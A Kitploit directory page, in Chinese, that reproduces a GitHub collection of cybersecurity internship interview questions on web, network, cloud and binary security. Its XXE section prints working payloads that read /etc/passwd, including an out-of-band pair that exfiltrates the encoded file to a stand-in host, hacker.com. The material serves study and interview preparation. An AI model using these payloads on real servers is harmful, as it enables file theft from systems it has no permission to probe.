Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
Interview_Tips — 我经历过的网络安全面试问题总结,希望对你有帮助 | Kitploit
工具/GitHubGitHub/jigerjain/interview_tips
Web安全网络安全密码学云安全学习与教育精选资源学习路径与课程二进制利用
GitHubjigerjain/interview_tips

Interview_Tips

我经历过的网络安全面试问题总结,希望对你有帮助

查看仓库
69176年前Kitploit 审核通过

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

面试技巧(信息安全)

本页是我所经历过的面试总结,涵盖了相当广泛的岗位,虽然也收到过多次拒绝,但我从每次面试中学习,收集建设性反馈,并继续前进。 希望这些问题/技巧能对你有所帮助。

它通常涵盖以下岗位:

  • 网络安全实习生
  • 渗透测试实习生 / 红队
  • Web 应用 / 应用安全实习生
  • 产品安全实习生
  • 基础设施安全实习生

快速提示:

  • 提前回顾你的简历,并预先向自己提出与简历相关的问题
  • 如果你不了解某个问题/概念,不要绕着话题打转,要表达出只要给我一个工作环境,你就能学会它 你不可能什么都知道,如果答错了或需要澄清,请虚心接受
  • 提前准备一段简短的自我介绍,用于介绍自己
  • 明确你的最终目标以及为什么选择信息安全?
  • 最后,在面试结束时一定要询问反馈,为什么,因为: 它有助于了解并填补你当前信息安全知识上的空白

我试着把下面所有遇到过的问题都记了下来,并为少数问题提供了答案。 其余问题你可以自己谷歌查找具体答案,如果你想深入钻研的话。此外,文末还有一些参考资料,可以去看看。那些真的很有帮助。

随着我不断前进并翻看笔记,我会很乐意添加更多问题,但如果你能通过 [email protected] 联系我,给我一些建设性反馈,我会非常感激。 如果你遇到了这里没有涵盖的内容,请随时分享。

常见问题

  1. 安全三元组:

什么是 CIA?

  • 机密性(Confidentiality)
  • 完整性(Integrity)
  • 可用性(Availability)

什么是 AAA?

  • 认证(Authentication)
  • 授权(Authorization)
  • 审计(Accounting)
  1. 威胁、漏洞、利用和风险之间的区别,以及它们与资产的关系
  • 威胁:
    威胁是我们试图防范的对象
  • 漏洞:
    漏洞是我们防护工作中的弱点或缺口
  • 利用:
    一种能力/程序(可能是软件或社会工程技巧),通过利用漏洞来攻击某个资产
  • 风险:
    风险是资产、威胁和漏洞的交集
  • 资产:
    资产是我们试图保护的对象
  1. 什么是 IAM,为什么要使用它?
    IAM 是身份与访问管理(Identity Access Management),用于在组织内隔离角色和职责。它是安全领域的关键组成部分,有助于维护访问级别的安全和权限

通用安全

网络入侵攻击的阶段:

  • 侦察 / 信息收集
  • 获取所需访问权限
  • 维持访问权限
  • 清除痕迹(删除日志、后门,隐藏所有控制)

Web 应用安全

  1. 常见问题:
  • OWASP Top 10

  • 什么是 XSS(跨站脚本攻击)

    • 在以下地址练习 XSS: [https://xss-game.appspot.com/]
    • 如何防御 XSS:简单来说,使用适当的输入验证
    • 查找 CSP(内容安全策略)响应头
    • XSS 的不同类型:
      反射型、存储型和基于 DOM 的 XSS
    • DOM 中可能导致 XSS 的 source 和 sink 有哪些:
      [https://www.netsparker.com/blog/web-security/dom-based-cross-site-scripting-vulnerability/]
  • 什么是 CSRF
    这是每个面试官都爱问的“甜心”问题
    快速提示: 回答要简洁,如果被追问再解释完整原理

    跨站请求伪造(CSRF)是一种攻击,迫使已通过身份验证的终端用户在当前登录的 Web 应用中执行非自愿的操作。CSRF 攻击专门针对会改变状态的请求,而非窃取数据,因为攻击者无法看到伪造请求的响应。借助一点社会工程学手段(例如通过电子邮件或聊天发送链接),攻击者可以欺骗 Web 应用的用户执行攻击者所选择的操作。如果受害者是普通用户,成功的 CSRF 攻击可以迫使用户执行改变状态的请求,例如转账、更改电子邮件地址等。如果受害者是管理账户,CSRF 可能会危及整个 Web 应用。

  • 如何防御 CSRF:
    使用反 CSRF 令牌
    使用同源策略
    使用 Referrer 头

  • 什么是 HTML / URL 编码

  • HTTP 协议是无状态的吗?
    HTTP 本质上是一种无状态协议,但服务器使用 Cookie 使其变得有状态

  • 注入攻击有哪些类型:SQL、命令、操作系统

  • 如何防御 SQL 注入
    使用参数化查询和存储过程

  1. 检查有助于提供安全的响应头(查看这些 URL 并浏览其内容,有助于你构建基础知识):
  • CSP(内容安全策略) [https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Security-Policy]
    [https://www.html5rocks.com/en/tutorials/security/content-security-policy/]
  • CORS(跨域资源共享) [https://developer.mozilla.org/en-US/docs/Web/HTTP/CORS]
  • 同源策略 [https://developer.mozilla.org/en-US/docs/Web/Security/Same-origin_policy]
  1. 有些问题在极少数情况下才会被面试官问到,我在几次面试的后续阶段遇到过以下问题,认为值得提一下:
  • 什么是 XXE(XML 外部实体)?
    XML 外部实体注入(也称为 XXE)是一种 Web 安全漏洞,允许攻击者干扰应用程序对 XML 数据的处理。它通常允许攻击者查看应用程序服务器文件系统上的文件,并与应用程序本身可以访问的任何后端或外部系统进行交互。
    查看这个 [https://portswigger.net/web-security/xxe]
    例如:
    root@kitploit:~
    <?xml version="1.0" encoding="UTF-8"?>    
    <!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>     
    <stockCheck><productId>&xxe;</productId></stockCheck> 
    
    在某些情况下,攻击者可以利用 XXE 漏洞执行服务端请求伪造(SSRF)攻击,从而将 XXE 攻击升级为破坏底层服务器或其他后端基础设施。
  • 带外(Out-Of-Band):使用 XML 实体,可以从服务器获取数据并发送到 hacker.com(无需服务器输出)

注入目标:document.xml

root@kitploit:~
<!DOCTYPE root [
    <!ENTITY % remote SYSTEM "http://hacker.com/evil.dtd">
    %remote; %intern; %xxe;
]>
<root>&xxe;</root> - you can change xxe entity to general entity

外部主机:http://hacker.com/evil.dtd

root@kitploit:~
<!ENTITY % payl SYSTEM "php://filter/read=convert.base64-encode/resource=file:///etc/passwd">
<!ENTITY % intern "<!ENTITY &#37; xxe SYSTEM 'http://hacker.com/result-is?%payl;'>">
                    --- OR ---
<!ENTITY % intern "<!ENTITY &#37; xxe SYSTEM 'file://%payl;'>"> - consider error-based

参考:[https://phonexicum.github.io/infosec/xxe.html]

  • 什么是 SSRF(服务端请求伪造)攻击
    可用于进入内部网络进行横向移动
  • 如何保护三层 Web 架构
  • 什么是 Kerberos
    https://www.varonis.com/blog/kerberos-authentication-explained/
  • 什么是机密管理和 Vault
    https://www.hashicorp.com/resources/introduction-vault-whiteboard-armon-dadgar

网络安全

  • 对称加密与非对称加密的区别
  • 公钥密码学与非对称密码学的区别:两者是一样的 陷阱题
  • 加密模式(例如 EBC、CBC 等)
  • 什么是完美前向保密(Perfect Forward Secrecy)
    [https://scotthelme.co.uk/perfect-forward-secrecy/] 简而言之,PFS 的主要作用是确保在服务器私钥被泄露的情况下,攻击者无法解密任何之前的 TLS 通信。完美前向保密可以通过使用 Diffie-Hellman 临时密钥交换来实现,这种交换为每个会话提供新密钥,并且只要会话处于活动状态,密钥就有效。
  • 密码套件解析:
    示例:TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256
    https://scotthelme.co.uk/https-cheat-sheet/
  • 在数据压缩和加密过程中,先进行压缩还是加密?
    先进行压缩,因为数据中随机性的熵(分布)较低,因此可以实现更高的压缩率,所以先压缩再加密是有利的。
  • 加密、编码、哈希和混淆之间的区别
    https://danielmiessler.com/study/encoding-encryption-hashing-obfuscation/
  • 什么是彩虹表:简单来说,它是预计算哈希的集合
  • TLS 是如何工作的?
    这是一张我偶然发现的很有意思的图片,它帮助我用通俗的话理解 TLS
    http://i.imgur.com/5T2fJsG.png
  • 什么是证书签名
  • Traceroute 是如何工作的
  • Nmap 是如何工作的
  • 什么是证书颁发机构(CA)
  • 什么是 DMZ,它涉及哪些组件
  • ping 使用哪个端口工作?
    这是一个陷阱题,但很重要。
    提示:ICMP 是第 3 层协议(它不通过端口工作)。这个问题的一个不错变体是问 ping 使用 TCP 还是 UDP。回答其中任何一个都是失败,因为它们是第 4 层协议。

云安全

这里将主要以 AWS 为例进行讨论,不过还有其他云服务提供商,如 Azure、GCP、Digital Ocean 等。

  • AWS 的通用组件:
    S3、EC2、存储桶(Buckets)、IAM、Cloud trial、Cloud watch
  • 什么是 IAM 及其组件:简而言之,IAM 用于访问管理,它使用角色(用于临时访问)、策略、组和用户来发挥作用
  • 什么是 EC2:它是用于创建虚拟机的弹性实例
  • EC2 有加密吗:有。Amazon EBS 加密为你的 EBS 卷提供了一种简单的加密解决方案,无需构建、维护和保护自己的密钥管理基础设施。Amazon EBS 加密在创建加密卷以及从这些卷创建的任何快照时,会使用 AWS Key Management Service(AWS KMS)客户主密钥(CMK)。 更多内容可在下方找到…… https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/EBSEncryption.html

二进制利用

  • 可用于调试二进制的工具:
    Linux:gdb、radare、clutter(radare 的图形界面)
    Windows:IDA、Binary Ninja
  • 什么是缓冲区溢出
  • 什么是格式化字符串漏洞
  • 栈(Stack)和堆(Heap)区域的区别(也可以考虑查看代码段、文本段和 BSS 段)
  • 什么是栈保护(Stack Cookies)
  • 什么是 ASLR,为什么要使用它?
  • 什么是不可执行内存?

参考资料

学习资源:
https://regexone.com/ (正则表达式是必须的!)
https://portswigger.net/web-security/
OWASP Top 10:
https://www.owasp.org/images/7/72/OWASP_Top_10-2017_%28en%29.pdf.pdf
信息安全面试问题:
https://danielmiessler.com/study/infosec_interview_questions
顶级渗透测试问题:
https://resources.infosecinstitute.com/top-30-penetration-tester-pentester-interview-questions-and-answers-for-2019/#gref
Python 技巧:
https://www.codementor.io/sheena/essential-python-interview-questions-du107ozr6
AWS 用户指南:
https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/concepts.html
SMB 和 Samba 见解: https://fitzcarraldoblog.wordpress.com/2016/10/17/a-correct-method-of-configuring-samba-for-browsing-smb-shares-in-a-home-network/

下载工具